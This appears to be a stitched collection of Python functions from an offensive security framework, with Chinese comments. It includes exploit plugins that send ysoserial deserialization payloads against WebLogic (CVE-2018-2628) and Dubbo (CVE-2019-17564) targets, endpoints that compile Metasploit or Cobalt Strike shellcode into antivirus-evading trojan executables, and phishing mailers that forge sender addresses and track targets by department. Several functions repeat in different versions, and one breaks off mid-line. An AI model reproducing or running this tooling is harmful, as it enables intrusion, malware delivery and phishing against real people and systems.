def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None:
if proxies!=None:
proxies_scheme, proxies_url, proxies_port = UrlProcessing().result(proxies)
socks.set_default_proxy(socks.HTTP, addr=proxies_url, port=proxies_port) # 设置socks代理
socket.socket = socks.socksocket # 把代理应用到socket
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
DL=Dnslog()
JrmpPort = "2000"#端口随便
JrmpClient = "JRMPClient"
YsoserialPath=GetToolFilePath().Result()+"ysoserial.jar"
TempPath=GetTempFilePath().Result()+str(int(time.time()))+"_"+randoms().result(10)
con,payload=exploit(url, port, YsoserialPath, DL.dns_host(), JrmpPort, JrmpClient,TempPath)
time.sleep(5)
if DL.result():
Medusa = "{}存在WeblogicWLS核心组件反序列化命令执行漏洞\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n".format(url,payload,con,DL.dns_host(),DL.dns_text())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
def NistInitialization(): #进行初始化处理
TempFilePath = GetTempFilePath().Result() # 获取TMP文件路径
if not InitialVerification(TempFilePath): #如果不存在初始化
print("[ + ]正在初始化CVE数据库,请不要结束进程,强制结束会导致CVE数据库数据不全")
Loop = asyncio.get_event_loop()
NistTasks = [
NistFirstRunDownload(Year, TempFilePath)
for Year in range(2002,
datetime.datetime.now().year + 1)
] #获取当前年份进行循环下载
Loop.run_until_complete(asyncio.wait(NistTasks))
Loop.close() #下载完毕
#进行数据写入
for Year in range(2002, datetime.datetime.now().year + 1): #下载完后再写入
try:
FileName = "nvdcve-1.1-" + str(Year) + ".json.zip" # 下载文件名
NistFirsRunProcessing(TempFilePath + FileName,
FileName[:-4]) # 调用数据处理函数,传入文件路径和提取文件名
except Exception as e:
ErrorLog().Write(
"Web_CommonVulnerabilitiesAndExposuresMonitor_VulnerabilityNumberMonitoring_NistInitialization_NistInitialization(def)",
e)
open(TempFilePath + "initialization.lock",
'w+').write("Super Invincible Cute Pieck Finger") #初始化后写入初始化锁
print("CVE数据库初始化成功~")
def ShellcodeToVirus(request):#shellcode转换生成病毒
RequestLogRecord(request, request_api="shellcode_to_virus")
if request.method == "POST":
try:
Token=json.loads(request.body)["token"]
Shellcode = json.loads(request.body)["shellcode"]#shellcode字符串
ShellcodeType = json.loads(request.body)["shellcode_type"] # shellcode来着MSF还是CS
Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID
if Uid != None: # 查到了UID
UserOperationLogRecord(request, request_api="shellcode_to_virus", uid=Uid)
TempFilePath = GetTempFilePath().Result() # temp文件路径
RandomName = randoms().EnglishAlphabet(5) + str(int(time.time())) # 随机名称
VirusOriginalFilePath = TempFilePath + RandomName + ".c" # 病毒原始文件名
VirusFileStoragePath = GetVirusFilePath().Result() # 病毒文件存放路径
VirusFileGenerationPath = VirusFileStoragePath + RandomName + ".exe" # 病毒文件生成路径
if sys.platform == "win32":
pass#windows的暂时没测试
elif sys.platform == "linux":
CFile = open(VirusOriginalFilePath, "w+")
CFile.write(MSF_VirtualAllocEx.GenerateCode(Shellcode))#获取生成代码后写入文件中
CFile.close()
Command="i586-mingw32msvc-gcc -mwindows " + VirusOriginalFilePath + " -o " + VirusFileGenerationPath
RedisCompileCodeTask=CompileCode.delay(Command)
AntiAntiVirusData().Write(uid=Uid,shellcode_type=ShellcodeType,virus_original_file_name=RandomName + ".c",virus_generate_file_name=RandomName + ".exe",compilation_status="0",redis_id=RedisCompileCodeTask.task_id)
return JsonResponse({'message': "宝贝任务已下发~", 'code': 200, })
else:
return JsonResponse({'message': "你的电脑不是Windows或者Linux无法使用该功能ლ(•̀ _ •́ ლ)", 'code': 600, })
else:
return JsonResponse({'message': "小宝贝这是非法请求哦(๑•̀ㅂ•́)و✧", 'code': 403, })
except Exception as e:
ErrorLog().Write("Web_AntiAntiVirus_GenerateVirusFiles_ShellcodeToVirus(def)", e)
return JsonResponse({'message': "呐呐呐!莎酱被玩坏啦(>^ω^<)", 'code': 169, })
else:
return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def medusa(**kwargs) -> None:
Url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
DL = Dnslog()
JrmpPort = "2000" #端口随便
JrmpClient = "JRMPClient"
YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
TempPath = GetTempFilePath().Result() + str(int(
time.time())) + "_" + randoms().result(10)
con, payload = exploit(url, port, YsoserialPath, DL.dns_host(),
JrmpPort, JrmpClient, TempPath)
time.sleep(5)
if DL.result():
Medusa = "{}存在WeblogicWLS核心组件反序列化命令执行漏洞(CVE-2018-2628)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\nDNSlog内容:{}\r\nDNSlog返回结果:{}\r\n".format(
url, payload, con, DL.dns_host(), DL.dns_text())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, "", **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) # 调用写入类传入URL和错误插件名
def SendMail(MailMessage, Attachment, Image, MailTitle, Sender, GoalMailbox,
ThirdParty, ForgedAddress):
MailStatus = {}
# 邮件内容
TempFilePath = GetTempFilePath().Result()
MailUploadFilePath = GetMailUploadFilePath().Result() # 本地文件路径
for Target in list(set(GoalMailbox)): # 先去重,然后像多个目标发送
try:
EmailBox = MIMEMultipart() # 创建容器
EmailBox['From'] = Header(Sender + "<" + ForgedAddress + ">",
'utf-8') # 发送人
EmailBox['To'] = Header(Target, 'utf-8') # 发给谁
EmailBox['Subject'] = Header(MailTitle, 'utf-8') # 标题
EmailBox["Accept-Language"] = "zh-CN"
EmailBox["Accept-Charset"] = "ISO-8859-1,utf-8"
# 消息正文
TextMessage = MIMEMultipart('alternative')
EmailBox.attach(TextMessage)
TextMessage.attach(MIMEText(MailMessage, 'html', 'utf-8'))
# 发送附件
for i in Attachment:
AttachmentTemp = TempFilePath + i # 文件名字
AttachmentName = MailUploadFilePath + Attachment[i] # 文件真实名字
shutil.copy(AttachmentName, AttachmentTemp) # 复制到temp目录
AttachmentData = MIMEApplication(
open(AttachmentTemp, 'rb').read()) # 使用temp文件的重命名文件进行发送
AttachmentData.add_header('Content-Disposition',
'attachment',
filename=i)
TextMessage.attach(AttachmentData)
# 正文图片
for x in Image:
ImageTemp = TempFilePath + x # 文件名字
ImageName = MailUploadFilePath + Image[x] # 文件真实名字
shutil.copy(ImageName, ImageTemp) # 复制到temp目录
pic = MIMEApplication(open(ImageTemp, 'rb').read())
pic.add_header("Content-Disposition", "attachment", filename=x)
pic.add_header('Content-ID', '<' + x + '>')
pic.add_header("X-Attachment-Id", "x")
TextMessage.attach(pic)
SMTP = smtplib.SMTP()
if int(ThirdParty) == 1: # 判断是否使用自建服务器
SMTP.connect(third_party_mail_host, 25) # 25 为 SMTP 端口号
SMTP.login(third_party_mail_user, third_party_mail_pass)
SMTP.sendmail(third_party_mail_user, Target,
EmailBox.as_string())
else:
SMTP.connect(local_mail_host, 25) # 25 为 SMTP 端口号
#SMTP.set_debuglevel(True)
SMTP.sendmail(local_mail_user, Target, EmailBox.as_string())
MailStatus[Target] = "1" # 写到状态表中
SMTP.quit()
SMTP.close()
except Exception as e:
MailStatus[Target] = "0"
ErrorLog().Write("Mail delivery failed->" + str(Target), e)
MaliciousEmail().UpdateStatus(mail_status=json.dumps(MailStatus),
redis_id=SendMail.request.id) #更新数据库
def SendMail(MailMessage, Attachment, MailTitle, Sender, GoalMailbox,
ThirdParty, ForgedAddress):
MailStatus = {}
# 邮件内容
TempFilePath = GetTempFilePath().Result()
MailAttachmentFilePath = GetMailAttachmentFilePath().Result() # 本地文件路径
for Target in list(set(GoalMailbox)): # 先去重,然后像多个目标发送
try:
EmailBox = MIMEMultipart() # 创建容器
EmailBox['From'] = Sender + "<" + ForgedAddress + ">" # 发送人
EmailBox['To'] = Target # 发给谁
EmailBox['Subject'] = Header(MailTitle, 'utf-8') # 标题
# 发送附件
for i in Attachment:
Temp = TempFilePath + i # 文件名字
AttachmentName = MailAttachmentFilePath + Attachment[
i] # 文件真实名字
shutil.copy(AttachmentName, Temp) # 复制到temp目录
AttachmentData = MIMEApplication(open(
Temp, 'rb').read()) # 使用temp文件的重命名文件进行发送
AttachmentData.add_header('Content-Disposition',
'attachment',
filename=i)
EmailBox.attach(AttachmentData)
# 消息正文
TextMessage = MIMEMultipart('alternative')
EmailBox.attach(TextMessage)
TextMessage.attach(MIMEText(MailMessage, 'html', 'utf-8'))
# # 指定图片为当前目录
# MailImageFilePath = GetMailImageFilePath().Result()
# file = open(image_file, "rb")
# img_data = file.read()
# file.close()
# img = MIMEImage(img_data)
# img.add_header('Content-ID', 'dns_config')
# EmailBox.attach(img)
SMTP = smtplib.SMTP()
if int(ThirdParty) == 1: # 判断是否使用自建服务器
SMTP.connect(third_party_mail_host, 25) # 25 为 SMTP 端口号
SMTP.login(third_party_mail_user, third_party_mail_pass)
SMTP.sendmail(third_party_mail_user, Target,
EmailBox.as_string())
else:
SMTP.connect(local_mail_host, 25) # 25 为 SMTP 端口号
SMTP.sendmail(local_mail_user, Target, EmailBox.as_string())
MailStatus[Target] = "1" # 写到状态表中
SMTP.quit()
SMTP.close()
except Exception as e:
MailStatus[Target] = "0"
ErrorLog().Write("Mail delivery failed->" + str(Target), e)
MaliciousEmail().UpdateStatus(mail_status=json.dumps(MailStatus),
redis_id=SendMail.request.id) #更新数据库
def Run():
TempFilePath = GetTempFilePath().Result() # 获取TMP文件路径
PluginsFilePath=GetPluginsFilePath().Result()#获取插件文件路径
PluginsDB = Plugins() # 初始化连接
FileNameList=[]#文件名列表
if not InitialVerification(TempFilePath):#如果不存在初始化
PluginsDB.Initialization()#初始化清空数据库表
for Data in os.walk(PluginsFilePath):
for i in Data[2]:
FileNameList.append((i,))
if len(FileNameList) == 500: # 500写入一次数据库
PluginsDB.Write(FileNameList)
FileNameList.clear() # 写入后清空数据列表
PluginsDB.Write(FileNameList)#函数循环结束后也写入一次数据库,防止不足500的数据没写入
PluginsDB.con.close()#关闭数据库连接
open(TempFilePath + "InitializationPlugin.lock", 'w+').write("Super Invincible Cute Neiru Aonuma") # 初始化后写入初始化锁
def medusa(Url:str,RandomAgent:str,proxies:str=None,**kwargs)->None:
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
con=""
payload = '/org.apache.dubbo.samples.http.api.DemoService'
payload_url = scheme + "://" + url + ":" + str(port) + payload
DL=Dnslog()
JrmpClient = "CommonsCollections4"
YsoserialPath=GetToolFilePath().Result()+"ysoserial.jar"
TempPath=GetTempFilePath().Result()+str(int(time.time()))+"_"+randoms().result(10)
data=generate_payload(YsoserialPath, "ping "+DL.dns_host(), JrmpClient,TempPath)
headers = {
'User-Agent': RandomAgent,
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
try:
resp = requests.post(payload_url,data=data,headers=headers, proxies=proxies, timeout=6, verify=False)
con = resp.text
except:
pass
if DL.result():
Medusa = "{} 存在Dubbo反序列化漏洞(CVE-2019-17564)\r\n验证数据:\r\n返回DNSLOG:{}\r\n使用DNSLOG数据:{}\r\n返回数据包:{}\r\n".format(url,DL.dns_text(),DL.dns_host(),con)
print(Medusa)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import zipfile
import json
from Web.DatabaseHub import NistData
import urllib3
from ClassCongregation import GetTempFilePath, ErrorLog
from config import headers, nist_update_banner
import time
import requests
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
TempFilePath = GetTempFilePath().Result() # 获取TMP文件路径
def NistUpdateDownload(): #更新数据下载
try:
FileName = "nvdcve-1.1-" + str("modified") + ".json.zip" #下载文件名
SaveFileName = "nvdcve-1.1-" + str("modified") + str(int(
time.time())) + ".json.zip"
Url = "https://nvd.nist.gov/feeds/json/cve/1.1/" + FileName
StartingTime = time.time()
if nist_update_banner:
print("[ + ] 正在重新下载文件:\033[36m" + FileName + "\033[0m")
DownloadFile = requests.get(Url,
headers=headers,
verify=False,
timeout=60)
with open(TempFilePath + SaveFileName, 'wb+') as file:
file.write(DownloadFile.content)
if nist_update_banner:
print("[ - ] 成功下载文件:\033[36m" + FileName + "\033[0m 耗时:\033[34m" +
def ShellcodeToTrojan(request): #shellcode转换生成病毒
RequestLogRecord(request, request_api="shellcode_to_trojan")
if request.method == "POST":
try:
Token = json.loads(request.body)["token"]
Shellcode = json.loads(request.body)["shellcode"] #shellcode字符串
ShellcodeType = json.loads(
request.body)["shellcode_type"] #用来辨别MSF 还是CS
ShellcodeArchitecture = json.loads(
request.body)["shellcode_architecture"] # 架构类型 X86或者X64
Plugin = json.loads(request.body)["plugin"] # 当前shellcode使用的插件
Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID
if Uid != None: # 查到了UID
UserOperationLogRecord(request,
request_api="shellcode_to_trojan",
uid=Uid)
TrojanModulesFilePath = GetTrojanModulesFilePath().Result(
) #获取插件文件夹
PluginList = os.listdir(TrojanModulesFilePath) #获取文件夹中全部文件
if Plugin.endswith(".py") and (
Plugin in PluginList): #判断传入的是否是python插件,并且插件名称是否在列表中
try:
DynamicLoadingPluginPath = 'Web.TrojanOrVirus.Modules' + "." + Plugin.split(
'.')[0] # 去除.py后缀然后进行路径拼接
ScriptModule = importlib.import_module(
DynamicLoadingPluginPath) # 动态载入
TempFilePath = GetTempFilePath().Result() # temp文件路径
RandomName = randoms().EnglishAlphabet(5) + str(
int(time.time())) # 随机名称
VirusOriginalFilePath = TempFilePath + RandomName + ScriptModule.__language__ # 病毒原始文件名,后缀从插件中获取
VirusFileStoragePath = GetTrojanFilePath().Result(
) # 病毒文件存放路径
VirusFileGenerationPath = VirusFileStoragePath + RandomName + ScriptModule.__process__ # 病毒文件生成路径
#需要判断语言类型然后对应不同的生成方式
if sys.platform == "win32":
# windows的暂时没测试
return JsonResponse({
'message': "暂不支持Windows免杀方式~敬请关注后续更新",
'code': 601,
})
elif sys.platform == "darwin" or sys.platform == "linux": #判断当前运行的机器类型
File = open(VirusOriginalFilePath, "w+")
File.write(ScriptModule.main(
Shellcode)) #获取shellcode传入动态调用函数中,然后写入本地文件
File.close()
if ShellcodeArchitecture != "x86" and ShellcodeArchitecture != "x64": #判断对应架构
return JsonResponse({
'message': "暂不支持其他架构~",
'code': 440,
})
elif ShellcodeArchitecture == "x86" or ShellcodeArchitecture == "x64":
Command = Language2Command["linux"][
ScriptModule.__language__.split(
'.')[1]][ShellcodeArchitecture][
ScriptModule.__process__.split('.')
[1]] #通过文件中的语言类型和生成文件进行提取命令
if Command == None:
return JsonResponse({
'message': "呐呐呐!该种组合无法进行编译,请使用其他插件~",
'code': 450,
})
else:
CompleteCommand = Command + VirusFileGenerationPath + " " + VirusOriginalFilePath #进行命令拼接
RedisCompileCodeTask = CompileCode.delay(
CompleteCommand)
TrojanData().Write(
uid=Uid,
shellcode_type=ShellcodeType,
trojan_original_file_name=RandomName +
ScriptModule.__language__,
trojan_generate_file_name=RandomName +
ScriptModule.__process__,
compilation_status="0",
redis_id=RedisCompileCodeTask.task_id,
shellcode_architecture=
ShellcodeArchitecture,
plugin=ScriptModule.__heading__)
return JsonResponse({
'message': "宝贝任务已下发~",
'code': 200,
})
else:
return JsonResponse({
'message':
"你的电脑不是Mac或者Linux无法使用该功能ლ(•̀ _ •́ ლ)",
'code': 600,
})
except Exception as e:
ErrorLog().Write(
"Web_TrojanOrVirus_TrojanInterface_ShellcodeToTrojan(def)-Plugin",
e)
return JsonResponse({
'message': "呐呐呐!你这插件有问题呀!快上服务器看看是不是写错了",
'code': 197,
})
else:
return JsonResponse({
'message': "小伙子不要搞事情嗷,你不看看插件是否传入正确ლ(•̀ _ •́ ლ)",
'code': 430,
})
else:
return JsonResponse({
'message': "小宝贝这是非法请求哦(๑•̀ㅂ•́)و✧",
'code': 403,
})
except Exception as e:
ErrorLog().Write(
"Web_TrojanOrVirus_TrojanInterface_ShellcodeToTrojan(def)", e)
return JsonResponse({
'message': "呐呐呐!莎酱被玩坏啦(>^ω^<)",
'code': 169,
})
else:
return JsonResponse({
'message': '请使用Post请求',
'code': 500,
})
def SendMail(MailMessage, Attachment, Image, MailTitle, Sender, GoalMailbox,
ForgedAddress, Interval, Key):
# 邮件内容
TempFilePath = GetTempFilePath().Result()
MailUploadFilePath = GetMailUploadFilePath().Result() # 本地文件路径
for Department in GoalMailbox: #循环获取部门
for Target in GoalMailbox[Department]: # 向多个目标发送
time.sleep(float(Interval)) #邮件发送间隔
MD5 = hashlib.md5(Target.encode()).hexdigest() #计算文件MD5值
try:
EmailBox = MIMEMultipart() # 创建容器
EmailBox['From'] = Header(Sender + "<" + ForgedAddress + ">",
'utf-8') # 发送人
EmailBox['To'] = Header(Target) # 发给谁
EmailBox['Subject'] = Header(MailTitle, 'utf-8') # 标题
EmailBox["Accept-Language"] = "zh-CN"
EmailBox["Accept-Charset"] = "ISO-8859-1,utf-8"
# 消息正文
TextMessage = MIMEMultipart('alternative')
EmailBox.attach(TextMessage)
MailMessage = Template(MailMessage).render(
md5=MD5) #对里面的模板进行处理,目前固定为{{ md5 }}占位符
TextMessage.attach(MIMEText(MailMessage, 'html', 'utf-8'))
# 发送附件
for i in Attachment:
AttachmentTemp = TempFilePath + i # 文件名字
AttachmentName = MailUploadFilePath + Attachment[
i] # 文件真实名字
shutil.copy(AttachmentName, AttachmentTemp) # 复制到temp目录
AttachmentData = MIMEApplication(
open(AttachmentTemp,
'rb').read()) # 使用temp文件的重命名文件进行发送
AttachmentData.add_header('Content-Disposition',
'attachment',
filename=i)
TextMessage.attach(AttachmentData)
# 正文图片
for x in Image:
ImageTemp = TempFilePath + x # 文件名字
ImageName = MailUploadFilePath + Image[x] # 文件真实名字
shutil.copy(ImageName, ImageTemp) # 复制到temp目录
pic = MIMEApplication(open(ImageTemp, 'rb').read())
pic.add_header("Content-Disposition",
"attachment",
filename=x)
pic.add_header('Content-ID', '<' + x + '>')
pic.add_header("X-Attachment-Id", "x")
TextMessage.attach(pic)
SMTP = smtplib.SMTP()
if email_test: #判断是否测试用例
SMTP.connect(third_party_mail_host, 25) # 25 为 SMTP 端口号
SMTP.login(third_party_mail_user, third_party_mail_pass)
SMTP.sendmail(third_party_mail_user, Target,
EmailBox.as_string())
else:
SMTP.connect(local_mail_host, 25) # 25 为 SMTP 端口号
#SMTP.set_debuglevel(True)
SMTP.sendmail(local_mail_user, Target,
EmailBox.as_string())
SMTP.quit()
SMTP.close()
EmailDetails().Write(email=Target,
email_md5=MD5,
status="1",
project_key=Key,
department=Department)
except Exception as e:
ErrorLog().Write("Mail delivery failed->" + str(Target), e)
EmailDetails().Write(email=Target,
email_md5=MD5,
status="-1",
project_key=Key,
department=Department)
EmailProject().ProjectCompletion(redis_id=SendMail.request.id) #修改为完工
def ShellcodeToTrojan(request): ##shellcode转换生成病毒
RequestLogRecord(request, request_api="shellcode_to_trojan")
if request.method == "POST":
try:
Token = json.loads(request.body)["token"]
ShellcodeName = json.loads(request.body)["shellcode_name"] # 项目名字
Shellcode = json.loads(request.body)["shellcode"] #shellcode字符串
ShellcodeType = json.loads(
request.body)["shellcode_type"] #用来辨别MSF 还是CS
ShellcodeArchitecture = json.loads(
request.body)["shellcode_architecture"] # 架构类型 X86或者X64
Plugin = json.loads(request.body)["plugin"] # 当前shellcode使用的插件
Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID
if Uid != None: # 查到了UID
UserOperationLogRecord(request,
request_api="shellcode_to_trojan",
uid=Uid)
TrojanModulesFilePath = GetTrojanModulesFilePath().Result(
) #获取插件文件夹
PluginList = os.listdir(TrojanModulesFilePath) #获取文件夹中全部文件
try:
if ShellcodeName == "": #判断是否有名字
return JsonResponse({
'message': "未传入项目名称!",
'code': 410,
})
else:
if Plugin in PluginList: #判断传入的是否是python插件,并且插件名称是否在列表中
try:
TrojanPluginsPath = GetTrojanPluginsPath(
).Result() # 获取插件路径
YamlRawData = yaml.safe_load(
open(TrojanPluginsPath +
Plugin)) # 读取yaml文件
TempFilePath = GetTempFilePath().Result(
) # temp文件路径
RandomName = randoms().EnglishAlphabet(
5) + str(int(time.time())) # 随机名称
SourceFileSuffix = YamlRawData.get(
'language') #获取源文件后缀
GenerateFileSuffix = YamlRawData.get(
'process') #获取生成文件后缀
BuildCommand = YamlRawData.get(
'build') # 获取自定义新增编译命令
TrojanPluginsName = YamlRawData.get(
'name') # 获取插件名
VirusOriginalFilePath = TempFilePath + RandomName + "." + SourceFileSuffix # 病毒原始文件名,后缀从插件中获取
VirusFileStoragePath = GetTrojanFilePath(
).Result() # 病毒文件存放路径
VirusFileGenerationPath = VirusFileStoragePath + RandomName + "." + GenerateFileSuffix # 病毒文件生成路径
#需要判断语言类型然后对应不同的生成方式
if sys.platform == "win32":
# windows的暂时没测试
return JsonResponse({
'message': "暂不支持Windows免杀方式~敬请关注后续更新",
'code': 601,
})
elif sys.platform == "darwin" or sys.platform == "linux": #判断当前运行的机器类型
File = open(VirusOriginalFilePath, "w+")
#需要判断插件语言类型,进行针对处理
if SourceFileSuffix.lower(
) == "c" or SourceFileSuffix.lower(
) == "cpp": #如果是c或者cpp
File.write(
Cpp.Run(shellcode=Shellcode,
yaml_raw_data=YamlRawData)
) # 获取shellcode传入动态调用函数中,然后写入本地文件
elif SourceFileSuffix.lower(
) == "go": #如果是go
File.write(
Go.Run(shellcode=Shellcode,
yaml_raw_data=YamlRawData))
else:
return JsonResponse({
'message': "插件语言不在支持列表中",
'code': 490,
})
File.close()
if ShellcodeArchitecture != "x86" and ShellcodeArchitecture != "x64": #判断对应架构
return JsonResponse({
'message': "暂不支持其他架构~",
'code': 440,
})
elif ShellcodeArchitecture == "x86" or ShellcodeArchitecture == "x64":
Command = Language2Command["linux"][
SourceFileSuffix][
ShellcodeArchitecture][
GenerateFileSuffix] #通过文件中的语言类型和生成文件进行提取命令
if Command == None:
return JsonResponse({
'message':
"呐呐呐!该种组合无法进行编译,请使用其他插件~",
'code': 450,
})
elif BuildCommand is not None: #判断有没有在原始编译命令上新增的编译操作
if Command.find(
" -o ") != -1: #提取输出命令
Command = Command.replace(
" -o ", " " +
BuildCommand + " -o ")
elif Command.find(
" --out:") != -1: #提取输出命令
Command = Command.replace(
" --out:", " " +
BuildCommand + " --out:")
CompleteCommand = Command + VirusFileGenerationPath + " " + VirusOriginalFilePath #进行命令拼接
RedisCompileCodeTask = CompileCode.delay(
CompleteCommand)
TrojanData().Write(
uid=Uid,
shellcode_type=ShellcodeType,
shellcode_name=ShellcodeName,
trojan_original_file_name=RandomName
+ "." + SourceFileSuffix,
trojan_generate_file_name=RandomName
+ "." + GenerateFileSuffix,
compilation_status="0",
redis_id=RedisCompileCodeTask.
task_id,
shellcode_architecture=
ShellcodeArchitecture,
plugin=TrojanPluginsName)
return JsonResponse({
'message': "宝贝任务已下发~",
'code': 200,
})
else:
return JsonResponse({
'message':
"你的电脑不是Mac或者Linux无法使用该功能ლ(•̀ _ •́ ლ)",
'code': 600,
})
except Exception as e:
ErrorLog().Write(
"Web_TrojanOrVirus_TrojanInterface_ShellcodeToTrojan(def)-Plugin",
e)
return JsonResponse({
'message': "呐呐呐!你这插件有问题呀!快上服务器看看是不是写错了",
'code': 197,
})
else:
return JsonResponse({
'message':
"小伙子不要搞事情嗷,你不看看插件是否传入正确ლ(•̀ _ •́ ლ)",
'code': 430,
})
except Exception as e:
ErrorLog().Write(
"Web_TrojanOrVirus_TrojanInterface_ShellcodeToTrojan(def)-TrojanClass",
e)
return JsonResponse({
'message': "呐呐呐!未知错误內~",
'code': 161,
})
else:
return JsonResponse({
'message': "小宝贝这是非法请求哦(๑•̀ㅂ•́)و✧",
'code': 403,
})
except Exception as e:
ErrorLog().Write(
"Web_TrojanOrVirus_TrojanInterface_ShellcodeToTrojan(def)", e)
return JsonResponse({
'message': "呐呐呐!莎酱被玩坏啦(>^ω^<)",
'code': 169,
})
else:
return JsonResponse({
'message': '请使用Post请求',
'code': 500,
})